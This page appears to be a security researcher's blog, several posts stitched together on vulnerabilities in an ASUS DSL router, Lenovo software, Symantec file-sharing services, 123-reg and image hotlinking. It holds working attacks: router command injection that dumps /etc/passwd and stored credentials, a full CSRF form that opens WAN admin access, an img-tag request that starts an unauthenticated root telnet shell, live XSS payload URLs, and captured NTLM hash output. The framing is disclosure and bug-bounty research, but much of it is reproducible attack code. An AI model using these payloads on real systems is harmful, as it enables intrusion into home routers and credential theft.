Trusteer pinpoint

Alright, a quick post about Trusteers in-the-browser malware protection (this - https://www.trusteer.com/products/trusteer-pinpoint-malware-detection)

This issue is now fixed... altho I only heard this from word and mouth, no formal acknowledgement and most importantly no thank you.

Cryptolocker … you little shit.

So, readers if you already know me personally  you know what too expect, if you don’t, you might have a hard time with my writing skills (I mean lack of) … I’m quite terrible at it, but the information is accurate. if it frustrates you, maybe best you don’t scroll down.

 

- Looking at some of the feedback from the infosec community I’d say what I was dealing with was a variant of randsomware similar to cryptolocker. when I wrote the post below I had the assumption it was cryptolocker – so apologies for the in-adverted link-baiting.

DSL-N66U (Chapter One)

91oyZF1c+3L._SL1500_

… well it looks nice.

Let’s begin…

 

  • Command Execution
  • Hidden Accounts
  • Plain Text Password of ALL Accounts
  • CSRFing the WAN Access to management pages
  • Cool shit from Kos (Post coming)
  • More to come (Chapter 2)

 

If you look at this Request you will see the netstat -a -n is a legit linux (and windows) command,

http://192.168.1.1/cgi-bin/Main_Netstat_Content.asp?current_page=Main_Netstat_Content.asp&next_page=Main_Netstat_Content.asp&next_host=192.168.1.1&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&SystemCmd=netstat+-a+-n&preferred_lang=EN&firmver=1.0.6.3&cmdMethod=netstat&NetOption=-a&targetip=&ExtOption=-r+state&ResolveName=0

 

So I simply replaced it with cat+/etc/passwd Here is the response:

admin:$1$$W8ZNDHVGxsHc4y6mDv3AI/:0:0:root:/:/bin/sh
qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyui:$1$$MJ7v7GdeVaM1xIZdZYKzL1:0:0:root:/:/bin/sh
user3:$1$$MJ7v7GdeVaM1xIZdZYKzL1:0:0:root:/:/bin/sh
nobody:x:65534:65534:::

I know?! who the F&*! is user3 and qwertyuiop*!

So let’s Find out, I mean, we have command execution!

after a bit of mooching around I found this file /var/romfile.cfg so in the netstat command as we saw before I replaced the ‘netstat -a -n’ with ‘cat /var/romfile.cfg’ and it gave us more than enough information for example:

<Entry1
username=”qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyui
web_passwd=”12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678
display_mask=”D2 8C 84 8C 8C 8C 8C 8C 8C” />
user3″
web_passwd=”12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678
display_mask=”5E 8C 6 8C 8C 8C 8C 8C 8C” />

I logged out of my session with the logout button but my session still existed, only when I rebooted I could try the credentials (I tried user3 and it let me in with admin rights no problem)

Cool, so the next thing is to create a CSRF Attack to enable web access

using burpsuite pro the CSRF Generator is a piece of piss

here is the attack code, (could possibly loose alot of this but hey, it’s late)

 

<html>
<!– CSRF PoC – generated by Burp Suite Professional –>
<body>
<form action=”http://192.168.1.1/cgi-bin/Advanced_System_Content.asp” method=”POST”>
<input type=”hidden” name=”adminFlag” value=”0″ />
<input type=”hidden” name=”syslogEnable” value=”Yes” />
<input type=”hidden” name=”logLevelSelect” value=”7″ />
<input type=”hidden” name=”DisplayLevelSelect” value=”7″ />
<input type=”hidden” name=”RemotelogEnable” value=”0″ />
<input type=”hidden” name=”serverPort” value=”514″ />
<input type=”hidden” name=”logFlag” value=”1″ />
<input type=”hidden” name=”remoteSyslog” value=”Yes” />
<input type=”hidden” name=”RadioButtonFlag” value=”1″ />
<input type=”hidden” name=”radiotoggle&#95;original” value=”” />
<input type=”hidden” name=”SaveTime” value=”1″ />
<input type=”hidden” name=”uiViewSyncWith” value=”0″ />
<input type=”hidden” name=”uiClearPCSyncFlag” value=”0″ />
<input type=”hidden” name=”uiTimezoneType” value=”0″ />
<input type=”hidden” name=”uiTimezoneSecond” value=”” />
<input type=”hidden” name=”SaveTelnetd” value=”1″ />
<input type=”hidden” name=”SaveFirewall” value=”1″ />
<input type=”hidden” name=”SaveSwap” value=”1″ />
<input type=”hidden” name=”uiViewTools&#95;Password” value=”” />
<input type=”hidden” name=”uiViewTools&#95;PasswordConfirm” value=”” />
<input type=”hidden” name=”syslogServerAddr” value=”N&#47;A” />
<input type=”hidden” name=”uiViewdateToolsTZ” value=”GMT&#43;08&#58;00″ />
<input type=”hidden” name=”uiViewdateDS” value=”Disable” />
<input type=”hidden” name=”uiViewSNTPServer” value=”pool&#46;ntp&#46;org” />
<input type=”hidden” name=”telnetd&#95;enable” value=”1″ />
<input type=”hidden” name=”misc&#95;http&#95;x” value=”1″ />
<input type=”hidden” name=”misc&#95;httpport&#95;x” value=”1337″ />
<input type=”hidden” name=”misc&#95;httpsport&#95;x” value=”” />
<input type=”hidden” name=”swap&#95;enable” value=”1″ />
<input type=”hidden” name=”FAQ&#95;input” value=”” />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>

This will enable Web Interface Management on the wan on port 1337 (haha)

 

So what we have covered, Command execution, Hidden/Backdoor Accounts/ Dropping the passwords for all accounts / CSRF Attack to enable web interface on the WAN

 

More to come, Later. … I’m tired.

Apologies for the mumbling in the video … I mumble. on a mac (iMumble)

 

Cool Shit from Kos! [Link]

A friend of mine has also been doing some work and bouncing ideas to and from each other he has the RT-N66U so obviously this got his attention I would talk about what he’s done but I will talk about the classy one liner for a persistent  back door via telnet ! on whatever port you like … No AUTH.

the attack via GET request… ( I have tweeked to work with my DSL version, as apposed to his work on the RT version) … I love this.

<img src=’http://192.168.1.1/cgi-bin/Main_Netstat_Content.asp?current_page=Main_Netstat_Content.asp&next_page=Main_Netstat_Content.asp&next_host=192.168.1.1&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&SystemCmd=utelnetd+-p+5555+-l+/bin/sh&preferred_lang=EN&firmver=1.0.6.3&cmdMethod=netstat&NetOption=-a&targetip=&ExtOption=-r+state&ResolveName=0′>

I love get request CSRF it’s so sneaky to place too.

Now to jump straight in telnet, o, ipaddress port (enter) bam.

to kill it, get the process ID (via top command)

kill -9  pid

Very nice.

Alright ! 10 Bug hunter for 2013

Nice.

I have recently been listed in the top 10 bug hunters for 2013, 9th position in bug bounties and 8th position for charity bug bounties (nice), I can see my new role has effected my position but also have to be honest and can’t deny the skill out there. I don’t think i’ll be in the mix next year, I really have to focus more on my Role, most people in bug bounties are doing it to get a career , i’m lucky enough to be in an excellent position, hacking banks all day, and playing on bugcrowd on evenings and weekends … cool.

http://blog.bugcrowd.com/top-10-bug-bounty-hunters-for-charity-of-2013/ <– @n0x00

http://blog.bugcrowd.com/the-bugcrowd-top-10-for-2013/ <– @n0x00

 

 

Where the FROCK have you been n0x00 ?

Well.. so I haven’t had anything exciting to talk about for a while, simply because I have been super busy. I accepted a role within a Bank and they have plenty of work for me to be getting on with and most of my spare time is committed to learning more about SDLC and everything I have been missing, UK Web App pentesters usually focus on ‘front impact testing’ , this is testing it usually when it’s live or just about to go live (UAT/Pre-Prod) now I have a much larger testing landscape, I have some big tasks ahead and I guess posts will be a little slower, not to mention all the fun stuff I do at work can’t be hitting the public internet now can it … wouldn’t be very smart of me.

It’s a little sad, I see my Top 10 Bugcrowd status slowly falling away and I still didn’t get my decking top 10 t-shirt CASEY.

Just a little note really to say that the funnies will be a little diluted, I know I don’t have too much stuff on the site but I do try to talk about things that haven’t been seen elsewhere or bring more visibility to sneaky little tricks.

See you all soon… maybe.

Access Connect 0Dear.

Alrighty Let’s get streight too it. I do like me a Lenovo ThinkPad I’ve had a few X201,W520,E530 and now the powerhouse that is my x230, So I was reading a blogpost on DLL Hijacking (this one – Thank you HD) and I thought I’d run it against my box while me and Woody where beating some shit up… as you do.

so following the guide the output showed me that the QCtray.exe was vulnerable via 2 DLL Injection Candidates – we’ll pick on the .loc file type

So here is a video on how to exploit it and prove that it’s vulnerable! Usually I’d use my mac but this time I rattled it out on my Kali box (lenovo hah) Sorry that  the audio has fannied out on me – if you have any questions … drop me a line Enjoy.

-
-

When you follow the guide as mentioned above you will need to install ruby and have admin rights on the box your playing with, the scripts will load up all registered filetypes and monitor the behavior to see if they are being cheeky… and if they are it will rat them out so you can do cool stuff. – Great for build reviews right ?

And again with Armitage 

Just for clarity I have called lenovo and explained I needed to speak to someone about this, the initial response was effectively ‘we don’t know how to find someone for you’ after some pushing and scare mongering they suggested I send them an email for them to escalate internally, I did… three weeks ago… and nothing, so consider this blog post a gentle nudge.

Cool: http://osvdb.org/show/osvdb/96083

Symantec Secure Document Exchange & PGP Universal Messenger

 

I was submitting some bugs to eBay the other week and they provided me with an account on the PGP Universal Message and … eurgh… I can’t help it. file upload has a client side XSS, it’s not REALLY a sweet one but it’s nice to point out something they have overlooked as they have done a pretty good job at securing the PGP Universal Messenger anyway… but to recreate the attack you have to create a file that looks like a snipped of HTML – your not going to be-able to do this easily on windows so mac/linux/notwindows is required here is the command I issued on my mac in bold touch ‘<i onmouseover=alert(‘n0x00′)>n0x00′

 

and I uploaded it to the webapp and it will execute client side, altho when you send it it is sent as an attachment, you’d have to be pretty stupid to get cought in this as an attack … the scenarios would be pretty milky!

anyway this also works on the Secure Document Exchange (and I suspect a number of other attacks – as the SDE looks weak as piss tbh but it’s not really my place to actively poke around without a green light. but on the SDE it does store the payload and present it to all users reaching the ‘file’ – I’d love to give the SDE a good kickin’ but no rewards !

Screen Shot 2013-07-05 at 14.46.48

Oh and reflective unauthenticated XSS here too…

https://fileshare.symantec.com/NASApp/secure/UploadError.jsp?e=Anything+in+here.&sid=2220344304189683481

Anything+in+here can be replaced with your HTML/Javascript

such as :https://fileshare.symantec.com/NASApp/secure/UploadError.jsp?e=<h2 onmouseover=alert(‘@n0x00′)>Le Derp.&sid=2220344304189683481

Screen Shot 2013-07-05 at 14.40.11

Oh MY!

Mike at Symantec was pretty cool about the PGP Gateway Issue and this is the outcome http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20130722_00

 

As for the Secure Document Exchange… well I’m not sure about that ! watch out !

 

 

So I took the password off this, all issues submitted where shared with Symantec on the same day, I’ll assume it’s all fixed now it’s been around a year.

123-derp

A friend of mine mentioned on twitter that 123-reg had adjusted his settings to autorenew and he/everyone now has to manually go through all the domains on 123-reg and set up each domain manually. that’s shit. good work 123-reg. whoever made that decision needs to get over his/her ex.

So, having a poke around (passively) and as a 123-reg customer (generally I love 123-reg but a little birdy told me they probably wont be fixing this anytime soon and they are not responding as far as my inbox tells me, so this might prompt them.

I created a  CSRF ‘attack’ to disable auto renew a quicker way, then I thought hmm shit, they have no CSRF defence. that’s weak.

So I nocked up a sneaky attack that … if I was a bad guy, it would be a nice move.

Here we go – as always PoC Generated with Burpsuite Pro – if you want to see how that’s done there are Guides to using Burps CSRF generator on this site. .. go ahead snoop around.

DNS_record_injection_via_CSRF copy.html.derp //modify to your own domain to see it working against your own domains. 

About CSRF

External Authentication Injection Attack – (EAIA)

Alright, .. it sounds sexier than it is…

Hotlinking

From Wikipedia, the free encyclopedia

Hotlinking is a term used on the Internet that refers to the practice of displaying an image on a website by linking to the same image on another website, rather than saving a copy of it on the website on which the image will be shown. So, instead of loading picture.gif on to their own website, a website owner uses a link to the picture as http://example.com/picture.jpg. When the hotlinking website is loaded, the image is loaded from the other website, which uses its bandwidth, costing the hotlinked website’s owners money. For this reason many website owners use .htaccess files to prevent hotlinking. In some cases website owners use the .htaccess file to replace any hotlinked images with an offensive image to deter any other website owners from hotlinking.

Hotlinking can also be used for file types other than images, including documents and videos.

We have all seen it, done it, used it. What can we do with it?

Recently used this against galleryproject.org  and some other places (pending bounty feedback), and Google Blogger – they didn’t want to know !? … anyway,it’s a risk, I think quite overlooked until now ? recently? whatever.

i’m writing this so you can add this check to your existing methodology and to acknowledge that anything calling an ‘untrusted’ external resource is at fault.

The Attack:

hotlinking has a specific file type that it can link to in most cases. usually it’s jpg or image / movie formats supported by browsers, and the app will look at the url see that it ends in .jpg or .whatever and say yeahuuup that’ll do me.

but if we position a basic auth or an ntlm over http prompt we can position these in the path to the image, so when the image is called the authentication challenge kicks in (before it reaches the image).

http://www.coolwebsite.com/images/derp.jpg

the webapp will allow the url because it satisfies it’s requirements. but it wont know that on the root folder ‘/’ or on ‘/images/’ there is an authentication.

so if a trusted domain is allowing hotlinks usually to profile /header/company logo images this is a nice way to position an attack.

it will simply challenge the user for a username and password, some users may think ‘well, I’m on bigdomain.com, and it’s asking me for my username and password, … I’ll give it them’ and if your using old versions of IE or new versions with modified configurations (for sharepoint and stuff) you might automatically send your ntlm credentials to the attacker if he uses http ntlm as apposed to basic auth.

Basic Auth offers an attacker to leave a message that may aid in social engineering / convincing the victim it’s a legitimate prompt – the NTLM Prompt is richer in value if you succeed ( from my experience).

worth mentioning that in some instances you may need to turn the authentication on after you have applied it to a target, I haven’t done this or needed to …but suspect it may be handy to consider.

an interesting one, thought it was worth sharing.

Screen Shot 2013-06-21 at 11.39.47

 

 

Screen Shot 2013-06-21 at 11.04.35

Screen Shot 2013-06-21 at 11.40.54

What I See (Attack view)

[*] 82.35.166.7 http_ntlm – Request ‘/googleAPI/derp2.jpg’…
[*] 82.35.166.7 http_ntlm – Request ‘/googleAPI/derp.jpg’…
[*] 82.35.166.7 http_ntlm – Request ‘/googleAPI/derp2.jpg’…
[*] 82.35.166.7 http_ntlm – 2013-06-21 11:40:17 +0100
NTLMv1 Response Captured from 7.local
DOMAIN: USER: derp1
LMHASH:Disabled
NTHASH:55a28f7550bda95276c9c45e3b4f08f98cde6f9fac532cae

[*] 82.35.166.7 http_ntlm – Request ‘/googleAPI/derp.jpg’…
[*] 82.35.166.7 http_ntlm – Request ‘/googleAPI/derp.jpg’…
[*] 82.35.166.7 http_ntlm – Request ‘/googleAPI/derp2.jpg’…

 

Thats it really, maybe something to consider when all the XSS has been fixed yet your still able to reference images <img src> or when asked for a url to an image of your choice .

So watch out for sites that handle external URL’s and don’t check for folder level authentication.

 go see  for yourself but you will get those prompts.

Notes:

Some cases you may have to host an image first, then apply authentication after it has been accepted by the app.

http://simple.wikipedia.org/wiki/Hotlinking

http://www.metasploit.com/modules/auxiliary/server/capture/http_basic

http://www.offensive-security.com/metasploit-unleashed/Server_Capture_Auxiliary_Modules

 

Noted by Gallery Project

Screen Shot 2013-06-18 at 21.32.40 a known attack on anything with the ability to load up external resources .

nice of them to mention it, right at the bottom!
http://codex.galleryproject.org/Bounties#Thanks.21